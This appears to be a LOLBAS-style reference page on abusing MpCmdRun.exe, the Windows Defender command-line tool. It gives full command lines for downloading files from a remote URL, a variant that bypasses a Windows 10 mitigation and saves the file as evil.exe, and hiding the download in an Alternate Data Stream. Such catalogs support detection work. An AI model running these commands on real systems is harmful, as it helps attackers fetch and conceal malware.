MpCmdRun.exe

Binary part of Windows Defender. Used to manage settings in Windows Defender

Paths

  • C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.4-0\MpCmdRun.exe
  • C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.7-0\MpCmdRun.exe
  • C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe
  • C:\Program Files\Windows Defender\MpCmdRun.exe
  • C:\Program Files (x86)\Windows Defender\MpCmdRun.exe
  • C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23110.3-0\X86\MpCmdRun.exe

Commands

Download

Download file to specified path - Slashes work as well as dashes (/DownloadFile, /url, /path)

Use case: Download file

Privileges: User

MpCmdRun.exe -DownloadFile -url {REMOTEURL:.exe} -path {PATH_ABSOLUTE:.exe}

Download

Download file to specified path. Slashes work as well as dashes (/DownloadFile, /url, /path). Updated version to bypass Windows 10 mitigation.

Use case: Download file

Privileges: User

copy "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe" C:\Users\Public\Downloads\MP.exe && chdir "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\" && "C:\Users\Public\Downloads\MP.exe" -DownloadFile -url {REMOTEURL:.exe} -path C:\Users\Public\Downloads\evil.exe

ADS

Download file to machine and store it in Alternate Data Stream

Use case: Hide downloaded data into an Alternate Data Stream

Privileges: User

MpCmdRun.exe -DownloadFile -url {REMOTEURL:.exe} -path {PATH_ABSOLUTE:.exe}:evil.exe

Detection

Resources